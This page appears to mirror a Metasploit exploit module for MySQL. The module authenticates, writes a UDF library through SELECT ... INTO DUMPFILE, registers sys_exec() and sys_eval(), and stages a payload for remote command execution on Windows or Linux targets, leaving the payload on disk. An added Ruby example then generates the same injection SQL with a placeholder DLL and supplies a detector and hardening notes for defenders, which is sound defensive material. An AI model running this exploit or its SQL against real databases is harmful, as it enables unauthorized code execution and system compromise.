Oracle MySQL UDF Payload Execution
Source: metasploit.com  Author: todb  Published: 2017-12-25
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Oracle MySQL UDF Payload Execution',
        'Description'    => %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... INTO DUMPFILE method of binary injection. On
          default Microsoft Windows installations of MySQL (<= 5.5.9), directory write
          permissions are not enforced, and the MySQL service runs as LocalSystem.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
          and sys_exec() functions.
        },
        'Author'         =>
          [
            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
            'todb', # this Metasploit module
            'h00die' # linux addition
          ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            # Bernardo's work with cmd exec via udf
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
          ],
        'Platform'       => ['win', 'linux'],
        'Targets'        =>
          [
            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
    ))
    register_options(
      [
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
    ])
  end

  # Credentials come from the standard MySQL mixin options; USERNAME defaults to root.
  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  # Authenticate against the mysql schema, record the server architecture, and
  # make sure sys_exec() is registered, uploading the UDF library when it is
  # missing (or unconditionally when FORCE_UDF_UPLOAD is set). Returns the
  # login result, or nil when authentication fails.
  def login_and_get_sys_exec
    m = mysql_login(username, password, 'mysql')
    return if not m
    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      mysql_add_sys_exec
      # Re-check so that a failed upload is reported instead of assumed to work.
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end

    return m
  end

  # CmdStager callback: every staged command line is run through sys_exec().
  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  def exploit
    m = login_and_get_sys_exec()

    if not m
      return
    elsif not [:win32, :win64, :linux64, :linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else
      if @mysql_sys_exec_available
        # :nodelete keeps the dropped payload on disk (see the NOTE in the
        # description); the stager writes and launches it via sys_exec().
        execute_cmdstager({:linemax => 1500, :nodelete => true})
        handler
      else
        print_status("MySQL function sys_exec() not available")
        return
      end
    end
    disconnect
  end
end
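The module above delegates the actual SQL to the Msf::Exploit::Remote::MYSQL mixin (mysql_add_sys_exec, mysql_check_for_sys_exec), whose internals are not on this page. The following is an added example, not Metasploit's code, that spells out the statement shapes the technique relies on: a hex-literal SELECT ... INTO DUMPFILE that drops the library, CREATE FUNCTION ... SONAME registrations for sys_exec()/sys_eval(), and the mysql.func lookup that a pre-flight check would use. It also includes a small detector for those statement shapes in captured query text, which is the check a defender reviewing general-log or proxy captures would want. The DLL bytes are a constructed placeholder, the plugin directory and library name are assumptions, and the return types are those documented for lib_mysqludf_sys (sys_exec returns an INT exit status, sys_eval a STRING of output).

```ruby
# Added example, not part of the Metasploit module above.  It generates the
# SQL that a SELECT ... INTO DUMPFILE UDF injection issues, and a matching
# detector for those statements in captured query text.  The DLL bytes are a
# constructed placeholder, and the plugin directory and library name are
# assumptions for illustration only.
module MysqlUdf
  # Constructed placeholder standing in for lib_mysqludf_sys.dll; not a real DLL.
  FAKE_DLL = "MZ\x90\x00\x03\x00\x00\x00PAYLOAD".b

  # Return types as documented for lib_mysqludf_sys (assumed here):
  # sys_exec returns the exit status, sys_eval the command output.
  UDF_RETURN_TYPES = { 'sys_exec' => 'INT', 'sys_eval' => 'STRING' }.freeze

  # Escape a string for use inside a single-quoted MySQL literal.
  def self.escape(str)
    str.gsub('\\') { '\\\\' }.gsub("'") { "\\'" }
  end

  # Encode binary as a MySQL hex literal (0x4D5A...).  A hex literal needs no
  # quoting and carries arbitrary bytes, including NULs, intact.
  def self.hex_literal(bytes)
    '0x' + bytes.unpack1('H*').upcase
  end

  # SELECT ... INTO DUMPFILE writes the value verbatim: no column separators,
  # no escaping, no trailing newline, so the file is a byte-exact copy of the
  # literal.  That is what makes it usable for dropping a shared library.
  def self.dumpfile_statement(bytes, dest_path)
    "SELECT #{hex_literal(bytes)} INTO DUMPFILE '#{escape(dest_path)}'"
  end

  # CREATE FUNCTION ... SONAME registers a UDF exported by a library that the
  # server loads from its plugin directory.
  def self.create_function_statement(name, soname)
    "CREATE FUNCTION #{name} RETURNS #{UDF_RETURN_TYPES.fetch(name)} SONAME '#{escape(soname)}'"
  end

  # Pre-flight check (assumed form): an existing row in mysql.func means the
  # function is already registered and no upload is needed.
  def self.func_check_statement(name = 'sys_exec')
    "SELECT name, dl FROM mysql.func WHERE name = '#{escape(name)}'"
  end

  # Full statement sequence for one upload.  MySQL accepts forward slashes in
  # Windows paths, so the same join works for both targets.
  def self.upload_sequence(bytes, plugin_dir, soname)
    dest = "#{plugin_dir.chomp('/')}/#{soname}"
    [dumpfile_statement(bytes, dest)] +
      UDF_RETURN_TYPES.keys.map { |fn| create_function_statement(fn, soname) }
  end

  # Detection side: flag the two statement shapes above in captured SQL
  # (general query log, proxy capture, audit plugin output).
  DUMPFILE_RE = /\bINTO\s+DUMPFILE\b/i
  SONAME_RE   = /\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\b.*?\bSONAME\b/im

  def self.suspicious?(sql)
    !!(sql =~ DUMPFILE_RE || sql =~ SONAME_RE)
  end

  def self.flag_statements(statements)
    statements.select { |s| suspicious?(s) }
  end
end

if __FILE__ == $0
  # Constructed sample capture: benign queries around an attacker sequence.
  seq = MysqlUdf.upload_sequence(MysqlUdf::FAKE_DLL,
                                 'C:/Program Files/MySQL/lib/plugin',
                                 'lib_mysqludf_sys.dll')
  sample = ['SELECT @@version', *seq, 'SELECT * FROM mysql.user']
  MysqlUdf.flag_statements(sample).each { |s| puts "FLAGGED: #{s[0, 80]}" }
end
```

The detector deliberately does not match INTO OUTFILE, which legitimate exports use; DUMPFILE with a hex literal, and CREATE FUNCTION with SONAME, are the two statements a database that never loads UDFs should not be seeing. On the hardening side, MySQL's secure_file_priv variable restricts where INTO DUMPFILE may write, and a non-empty mysql.func table on a server that should have no UDFs is the residue this module leaves behind.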

 
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved